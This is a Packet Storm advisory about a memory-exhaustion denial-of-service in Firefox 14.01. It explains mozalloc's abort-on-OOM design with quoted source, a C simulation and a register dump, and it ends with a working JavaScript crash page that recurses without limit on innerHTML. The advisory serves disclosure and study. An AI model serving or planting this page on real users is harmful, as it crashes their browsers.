Mozilla Firefox 14.01 Denial Of Service

2012-08-17T00:00:00
ID PACKETSTORM:115648
Type packetstorm
Reporter Jean Pascal Pereira
Modified 2012-08-17T00:00:00

Description

<!--  
  
---------------------------------------------------  
Mozilla Firefox 14.01 Memory Exhaustion DoS Exploit  
---------------------------------------------------  
  
Credit: Jean Pascal Pereira <pereira@secbiz.de>  
  
Description:  
  
Mozilla Firefox is prone to a memory exhaustion denial of service: once an allocation request fails, the browser's infallible allocator wrappers in mozalloc abort the whole process instead of returning an error to the caller.  
The issue has been tested on Firefox 14.01; prior versions may also be affected.  
  
mozalloc.cpp, line 184:  
  
int  
moz_xposix_memalign(void **ptr, size_t alignment, size_t size)  
{  
    int err = posix_memalign(ptr, alignment, size);  
    if (UNLIKELY(err && ENOMEM == err)) {  
        // Infallible allocation: the OOM handler aborts the process,  
        // so the retry below is never reached in practice.  
        mozalloc_handle_oom();  
        return moz_xposix_memalign(ptr, alignment, size);  
    }  
    // else: (0 == err) or (EINVAL == err)  
    return err;  
}  
  
A crafted JavaScript page drives the browser into this path: unbounded recursion keeps appending ever longer strings to document.body.innerHTML until an allocation fails, the wrapper calls mozalloc_handle_oom(), and the process is aborted. The result is a crash of the entire browser, not an exception inside the page.  
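The difference between a fallible allocator (the caller sees NULL and can recover) and an infallible one (the OOM handler runs and never returns) is the whole mechanism behind this crash. The following C program is an added illustration, not Mozilla code: it uses a constructed 64 KiB allocation budget to reach ENOMEM deterministically, and stands in a longjmp for the real mozalloc_abort() so the outcome can be observed instead of killing the process. The step-n-allocates-n-bytes driver mirrors the quadratic growth of the PoC below.

```c
#include <errno.h>
#include <setjmp.h>
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>

/* Constructed allocation budget: models exhaustion without actually
 * draining the machine. */
static size_t g_remaining = 64 * 1024;
static int g_oom_handler_calls = 0;
static jmp_buf g_abort_point;

void reset_budget(size_t bytes)
{
    g_remaining = bytes;
    g_oom_handler_calls = 0;
}

int oom_handler_calls(void)
{
    return g_oom_handler_calls;
}

/* Stand-in for the system allocator: reports ENOMEM once the budget is
 * spent. The block is real so it can be freed; only the budget is simulated. */
static void *budgeted_malloc(size_t size)
{
    if (size > g_remaining) {
        errno = ENOMEM;
        return NULL;
    }
    g_remaining -= size;
    return malloc(size);
}

/* Fallible allocation: NULL is an ordinary return value the caller checks. */
void *fallible_malloc(size_t size)
{
    return budgeted_malloc(size);
}

/* Simulated OOM handler. In Firefox, mozalloc_handle_oom() ends in
 * mozalloc_abort(), which terminates the process; here the "abort" is a
 * longjmp back to the driver so the result can be inspected (assumption
 * made for the demo, not Mozilla's behaviour). */
static void simulated_handle_oom(void)
{
    g_oom_handler_calls++;
    longjmp(g_abort_point, 1);
}

/* Infallible allocation in the style of mozalloc's moz_x* wrappers: a failed
 * request never reaches the caller as NULL; the OOM handler does not return. */
void *infallible_malloc(size_t size)
{
    void *p = budgeted_malloc(size);
    if (p == NULL) {
        simulated_handle_oom();
    }
    return p;
}

/* Driver with the PoC's growth pattern: step n requests n bytes, so the
 * cumulative demand grows quadratically. Returns the number of steps that
 * completed before the allocator reported ENOMEM. */
long run_fallible(size_t max_steps)
{
    long done = 0;
    for (size_t n = 1; n <= max_steps; n++) {
        void *p = fallible_malloc(n);
        if (p == NULL) {
            return done;   /* recoverable: stop growing, keep running */
        }
        free(p);
        done++;
    }
    return done;
}

/* Same driver through the infallible wrapper. Returns the step count, or -1
 * when the simulated abort fired: there is no recovery path at all. */
long run_infallible(size_t max_steps)
{
    volatile long done = 0;
    if (setjmp(g_abort_point) != 0) {
        return -1;
    }
    for (size_t n = 1; n <= max_steps; n++) {
        void *p = infallible_malloc(n);
        free(p);
        done++;
    }
    return done;
}

int main(void)
{
    reset_budget(64 * 1024);
    printf("fallible:   %ld steps, then ENOMEM returned\n", run_fallible(1000));
    reset_budget(64 * 1024);
    long r = run_infallible(1000);
    printf("infallible: %ld (abort fired %d time)\n", r, oom_handler_calls());
    return 0;
}
```

With a 64 KiB budget the fallible driver completes 361 steps (1 + 2 + ... + 361 = 65341 bytes) and then gets NULL for the 362-byte request; the infallible driver reaches the same request and the OOM handler fires once. Aborting on OOM is a deliberate design choice (it rules out the memory-safety bugs that unchecked NULL returns cause), which is why the page's issue is an availability problem rather than a memory-corruption one.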
  
Register dump at the abort (Windows 7 SP1). EIP is inside mozalloc, ESI/EDI point at MSVCR100's __p__iob and fputs (consistent with mozalloc_abort() writing its message to stderr before terminating), and LastErr is ERROR_NOT_ENOUGH_MEMORY:  
  
EAX 00000000  
ECX 5D923896 MSVCR100.5D923896  
EDX 00000003  
EBX 7FB00000 UNICODE "xxxxxxxxx [...]"  
ESP 002BB7F8  
EBP 002BB85C  
ESI 5D8D1EC6 MSVCR100.__p__iob  
EDI 5D92379C MSVCR100.fputs  
EIP 73FC1999 mozalloc.73FC1999  
C 0 ES 0023 32bit 0(FFFFFFFF)  
P 0 CS 001B 32bit 0(FFFFFFFF)  
A 0 SS 0023 32bit 0(FFFFFFFF)  
Z 0 DS 0023 32bit 0(FFFFFFFF)  
S 0 FS 003B 32bit 7FFDF000(C000)  
T 0 GS 0000 NULL  
D 0  
O 0 LastErr ERROR_NOT_ENOUGH_MEMORY (00000008)  
EFL 00000202 (NO,NB,NE,A,NS,PO,GE,G)  
ST0 empty 1.0000000000000000000  
ST1 empty 0.1085754583206562651  
ST2 empty -0.0696429635909516231  
ST3 empty 86.763962149620056150  
ST4 empty 31200.200000000000730  
ST5 empty 1.3451474216221712500e+15  
ST6 empty 1.0390856000000000000e+10  
ST7 empty 0.0  
3 2 1 0 E S P U O Z D I  
FST 0022 Cond 0 0 0 0 Err 0 0 1 0 0 0 1 0 (GT)  
FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1  
  
-->  
  
<html>  
<head>  
<title></title>  
</head>  
<body></body>  
<script>  
// Recursion with no base case: every call appends a string one character  
// longer than the previous one to the document body, so the DOM text grows  
// quadratically (and each innerHTML assignment re-parses the whole body)  
// until an allocation fails and mozalloc aborts the process.  
function e(x)  
{  
    document.body.innerHTML += x;  
    e(x + 'x');  
}  
  
e('x')  
</script>  
</html>  